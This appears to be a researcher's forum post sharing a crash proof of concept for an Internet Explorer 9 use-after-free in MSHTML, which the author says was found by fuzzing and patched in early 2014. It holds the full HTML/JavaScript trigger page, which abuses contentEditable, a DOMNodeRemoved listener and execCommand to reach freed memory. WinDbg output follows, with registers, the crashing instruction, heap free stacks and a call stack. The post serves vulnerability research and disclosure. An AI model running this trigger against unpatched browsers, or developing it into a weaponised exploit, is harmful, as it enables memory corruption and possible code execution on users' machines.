Internet Explorer 9 Use After Free Bug which was reported in January 2014 and patched in Feb/March 2014 (Dont Remember CVE as i lost my backup but found this POC somewhere recently so thought of sharing). This one is One the First POC/Crash generated by my then new Fuzzing Framework (Aayudh)

POC should work Internet Explorer Prior Feb 2014 patch.

I dont even remember if this one is Reduced POC or Raw POC

Code:
<!doctype html><html><HEAD><title></title>

<meta http-equiv="Content-type" content="text/html;charset=UTF-8">
<style>

</style>
<script>function grind(){


 document.body.contentEditable = 'true';
try {
var elt2 = document.getElementById('p22');
var rElmt1 = 'p16';
} 
catch(e){}
var i = 0;
try{
elt2.addEventListener("DOMNodeRemoved",function(){
document.execCommand('insertunorderedlist', null, true);
elt2.innerText="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
}, false);}
catch(e){}

try{

   var mySpan = document.getElementById (rElmt1);       
   var myRange = document.createRange ();			
   myRange.selectNodeContents (mySpan);			
   mySpan.innerHTML = "<ruby><audio><video><bd><a><b>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</b>";
   document.execCommand("SelectAll");
   document.execCommand("Delete");
}

catch(e){}

}</script></HEAD>


<body onload='grind();'><figure id="p16">AAAA 16</figure><input type=email id="p17">AAAA 17</input type=email><acronym id="p18">AAAA 18</acronym><embed id="p19">AAAA 19</embed><nav id="p20">AAAA 20</nav><details id="p21">AAAA 21</details><object id="p22">AAAA 22</object><rp id="p23">AAAA 23</rp><address id="p24">AAAA 24</address><h6 id="p25">AAAA 25</h6><b id="p26">AAAA 26</b><article id="p27">AAAA 27</article><textarea id="p28">AAAA 28</textarea><input type=url id="p29">AAAA 29</input type=url>"
</body></html>

Call Stack:
Code:
Full Page Heap Enabled
=================

1:021> g
(34c.37c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=7ffa7868 ecx=f0f0f0f0 edx=002c0174 esi=750d7f48 edi=8007000e
eip=6a1ae2a1 esp=059381a8 ebp=059381b4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
MSHTML!CElement::get_currentStyle+0xfe:
6a1ae2a1 8b5108          mov     edx,dword ptr [ecx+8] ds:0023:f0f0f0f8=????????
1:019> ub
MSHTML!CElement::get_currentStyle+0xe5:
6a1ae28c 50              push    eax
6a1ae28d 684c3d136a      push    offset MSHTML!IID_IHTMLCurrentStyle (6a133d4c)
6a1ae292 53              push    ebx
6a1ae293 ffd1            call    ecx
6a1ae295 8bf8            mov     edi,eax
6a1ae297 85ff            test    edi,edi
6a1ae299 0f856bc60f00    jne     MSHTML!CElement::get_currentStyle+0xf4 (6a2aa90a)
6a1ae29f 8b0b            mov     ecx,dword ptr [ebx]
1:019> u
MSHTML!CElement::get_currentStyle+0xfe:
6a1ae2a1 8b5108          mov     edx,dword ptr [ecx+8] <----- Crashing Instruction
6a1ae2a4 53              push    ebx
6a1ae2a5 ffd2            call    edx
6a1ae2a7 5e              pop     esi
6a1ae2a8 5b              pop     ebx
6a1ae2a9 85ff            test    edi,edi
6a1ae2ab 0f8866c60f00    js      MSHTML!CElement::get_currentStyle+0x10a (6a2aa917)
6a1ae2b1 8bc7            mov     eax,edi
1:019> dd ebx
7ffa7868  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
7ffa7878  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
7ffa7888  f0f0f0f0 f0f0f0f0 f0f0f0f0 a0a0a0a0
7ffa7898  a0a0a0a0 f0f0f0f0 00000000 00000000
7ffa78a8  25759b19 0001c500 7ffa39a8 002c00c4
7ffa78b8  28769b17 1001c50f abcdaaa9 80061000
7ffa78c8  00000028 00000050 00000002 7ffa72d8
7ffa78d8  00e69c5c dcbaaaa9 f0f0f0f0 f0f0f0f0
1:019> !heap -p -a ebx
    address 7ffa7868 found in
    _HEAP @ 2c0000
      HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state
        7ffa7840 000d 0000  [00]   7ffa7868    0002c - (free DelayedFree)
        6e04a7d6 verifier!AVrfpDphNormalHeapFree+0x000000b6
        6e0490d3 verifier!AVrfDebugPageHeapFree+0x000000e3
        77026694 ntdll!RtlDebugFreeHeap+0x0000002f
        76fea13e ntdll!RtlpFreeHeap+0x0000005d
        76fb65a6 ntdll!RtlFreeHeap+0x00000142
        7585c3d4 kernel32!HeapFree+0x00000014
        6a262089 MSHTML!CW3CComputedStyle::`scalar deleting destructor'+0x00000044   
        6a20af55 MSHTML!CBase::PrivateRelease+0x00000086
        6a2aa912 MSHTML!CElement::get_currentStyle+0x000000fc
        6a1aed45 MSHTML!CElement::ContextThunk_get_currentStyle+0x00000058
        6a86fc73 MSHTML!GetWhitespaceStyle+0x00000035
        6a86fd18 MSHTML!IsElementWhitespaceVisuallyCollapsed+0x0000003b
        6a86fdb3 MSHTML!CEditPointer::IsCurrentScopeWhitespaceVisuallyCollapsed+0x0000003d
        6a83c8a7 MSHTML!CBlockCommand::SanitizeSegment+0x000004b9
        6a836253 MSHTML!CListCommand::PrivateExec+0x00000176
        6a039dbf MSHTML!CCommand::Exec+0x00000044
        6a039f0d MSHTML!CMshtmlEd::Exec+0x0000018f
        6a2b2008 MSHTML!CEditRouter::ExecEditCommand+0x00000185
        6a24fc55 MSHTML!CDoc::ExecHelper+0x00004b78
        6a41ea15 MSHTML!CDocument::Exec+0x00000024
        6a4d0f28 MSHTML!CBase::execCommand+0x0000005b
        6a4212ff MSHTML!CDocument::execCommand+0x00000095
        6a5f6441 MSHTML!CFastDOM::CDocument::Trampoline_execCommand+0x0000013a
        6af18456 jscript9!Js::JavascriptFunction::CallFunction+0x000000c4
        6af57d68 jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x00000117


 
1:019> ub 6a262089
MSHTML!CW3CComputedStyle::`scalar deleting destructor'+0x29:
6a26206e ff15d813e369    call    dword ptr [MSHTML!_imp__InterlockedDecrement (69e313d8)]
6a262074 f6450801        test    byte ptr [ebp+8],1
6a262078 740f            je      MSHTML!CW3CComputedStyle::`scalar deleting destructor'+0x44 (6a262089)
6a26207a a180e68e6a      mov     eax,dword ptr [MSHTML!g_hProcessHeap (6a8ee680)]
6a26207f 56              push    esi
6a262080 6a00            push    0
6a262082 50              push    eax
6a262083 ff158c13e369    call    dword ptr [MSHTML!_imp__HeapFree (69e3138c)]

Heap is freed by the function MSHTML!CW3CComputedStyle::`scalar deleting destructor'+0x00000044 


1:019> kb
ChildEBP RetAddr  Args to Child              
059381b4 6a1aed45 74f3ca38 059381f0 750d7f48 MSHTML!CElement::get_currentStyle+0xfe
059381d8 6a86fc73 74f3ca38 059381f0 77198410 MSHTML!CElement::ContextThunk_get_currentStyle+0x58
059381f8 6a86fd18 05938288 77198410 059382cf MSHTML!GetWhitespaceStyle+0x35
05938210 6a86fdb3 00000000 00000001 00000001 MSHTML!IsElementWhitespaceVisuallyCollapsed+0x3b
05938224 6a83c8a7 77198410 00000000 00000000 MSHTML!CEditPointer::IsCurrentScopeWhitespaceVisuallyCollapsed+0x3d
059382d0 6a836253 0c2cefe8 7ffa6400 0c2cefe8 MSHTML!CBlockCommand::SanitizeSegment+0x4b9
05938324 6a039dbf 00000002 05938ed0 00000000 MSHTML!CListCommand::PrivateExec+0x176
05938344 6a039f0d 00000002 05938ed0 00000000 MSHTML!CCommand::Exec+0x44
05938370 6a2b2008 0c07af78 6a2167a4 00000889 MSHTML!CMshtmlEd::Exec+0x18f
059383a8 6a24fc55 0b6d4ff0 6a2167a4 00000889 MSHTML!CEditRouter::ExecEditCommand+0x185
05938e78 6a41ea15 080ecfb8 6a2167a4 00000889 MSHTML!CDoc::ExecHelper+0x4b78
05938e98 6a4d0f28 080ecfb8 6a2167a4 00000889 MSHTML!CDocument::Exec+0x24
05938ec0 6a4212ff 080ecfb8 00000889 0593000b MSHTML!CBase::execCommand+0x5b
05938ef8 6a5f6441 00000001 0b56efd4 00000000 MSHTML!CDocument::execCommand+0x95
05938f88 6af18456 053d3f00 10000004 053cba50 MSHTML!CFastDOM::CDocument::Trampoline_execCommand+0x13a
05938fcc 6af57d68 053d3f00 6a5f6307 10000004 jscript9!Js::JavascriptFunction::CallFunction+0xc4
05939020 04fa0a45 05939020 10000004 053cba50 jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x117
WARNING: Frame IP not in any known module. Following frames may be wrong.
05939058 6af18456 07bd65e0 00000002 07bd1210 0x4fa0a45
05939094 6af1837b 07bd65e0 04fa0970 00000002 jscript9!Js::JavascriptFunction::CallFunction+0xc4
059390f8 6af182b2 0936f958 00000002 059391f0 jscript9!Js::JavascriptFunction::CallRootFunction+0xb6